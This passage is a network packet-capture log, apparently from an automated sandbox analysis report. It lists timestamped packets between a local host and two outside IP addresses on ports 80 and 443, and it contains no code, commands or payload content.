Nov 5, 2024 18:46:07.920934916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.920943975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.920967102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.920986891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.920986891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.921020985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.921031952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.921041012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.921062946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.921087980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.953330994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.953341961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.953351974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.953361988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.953399897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.953414917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.953556061 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.953731060 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.953789949 CET	49806	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.953869104 CET	49806	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.953877926 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.953888893 CET	49806	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.953892946 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.957210064 CET	49811	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.957226038 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.957305908 CET	49811	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.957478046 CET	49811	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.957494020 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.010713100 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.011209965 CET	49808	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.011233091 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.011670113 CET	49808	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.011676073 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.020461082 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.020785093 CET	49807	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.020811081 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.021157026 CET	49807	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.021163940 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.062190056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062203884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062211037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062275887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062287092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062299013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062417984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.062417984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.062534094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062544107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062553883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062582016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.062599897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.062623024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062633991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062644005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.062669992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.062696934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.063262939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063304901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063309908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.063323975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063349962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.063360929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.063369036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063379049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063410044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.063421011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.063946962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063957930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063967943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063978910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063987017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.063992023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.064024925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.064524889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.064572096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.064655066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.064666033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.064698935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.064730883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.064742088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.064749956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.064759970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.064784050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.064799070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.065527916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.065537930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.065547943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.065584898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.065594912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.065603971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.065613985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.065623999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.065637112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.065663099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.066478968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.066489935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.066499949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.066521883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.066541910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.066546917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.066560030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.066570044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.066580057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.066591978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.066601038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.066631079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.067419052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.067430973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.067440033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.067450047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.067461014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.067480087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.067502022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.139887094 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.140626907 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.140743971 CET	49808	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.143105984 CET	49808	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.143105984 CET	49808	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.143125057 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.143134117 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.143381119 CET	49812	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.143430948 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.143523932 CET	49812	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.143867970 CET	49812	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.143881083 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.152843952 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.152913094 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.152971983 CET	49807	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.153090000 CET	49807	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.153101921 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.153137922 CET	49807	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.153143883 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.155211926 CET	49813	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.155235052 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.155499935 CET	49813	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.155654907 CET	49813	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.155669928 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.205167055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205194950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205223083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205266953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205319881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205332041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205344915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205344915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205344915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205359936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205389023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205441952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205451965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205461979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205473900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205485106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205497980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205528975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205646038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205693007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205693007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205703974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205745935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205893993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205904961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205914974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205924988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.205941916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.205972910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206129074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206162930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206172943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206185102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206213951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206279039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206294060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206325054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206347942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206365108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206376076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206410885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206552029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206595898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206603050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206634045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206707954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206753016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206759930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206773996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206790924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206800938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.206805944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.206830978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207051039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207065105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207076073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207097054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207123041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207134008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207144976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207154989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207176924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207195997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207251072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207262039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207276106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207288027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207295895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207309008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207339048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207340002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207350969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207384109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207902908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207915068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207923889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.207945108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.207956076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.208058119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208069086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208077908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208098888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.208125114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.208216906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208261013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208261967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.208271980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208302021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.208312035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.208359003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208369970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208380938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208390951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208408117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.208408117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.208429098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.208448887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210184097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210232019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210242987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210253000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210266113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210279942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210289955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210295916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210320950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210340023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210360050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210370064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210380077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210407019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210433006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210454941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210467100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210477114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210488081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210499048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.210500002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210520029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.210544109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211272955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211282969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211323023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211328030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211338043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211348057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211358070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211364985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211369991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211390972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211421013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211592913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211605072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211613894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211637974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211662054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211664915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211673021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211685896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211694956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211703062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211704016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.211720943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211734056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.211756945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.212111950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212157965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.212158918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212168932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212207079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.212235928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212245941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212255955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212265968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212286949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.212307930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.212322950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212332964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212337971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212367058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212377071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.212378025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.212402105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.212430954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.213088036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.213099003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.213109016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.213131905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.213151932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.213156939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.213161945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.213171959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.213192940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.213201046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.213226080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.221055984 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.221570969 CET	49809	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.221585989 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.222105026 CET	49809	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.222110987 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.348861933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.348874092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.348885059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.348913908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.348946095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349009991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349019051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349028111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349042892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349071980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349360943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349374056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349384069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349394083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349400997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349437952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349519968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349529982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349539042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349566936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349569082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349577904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349587917 CET	80	49804	31.41.244.11	192.168.2.4
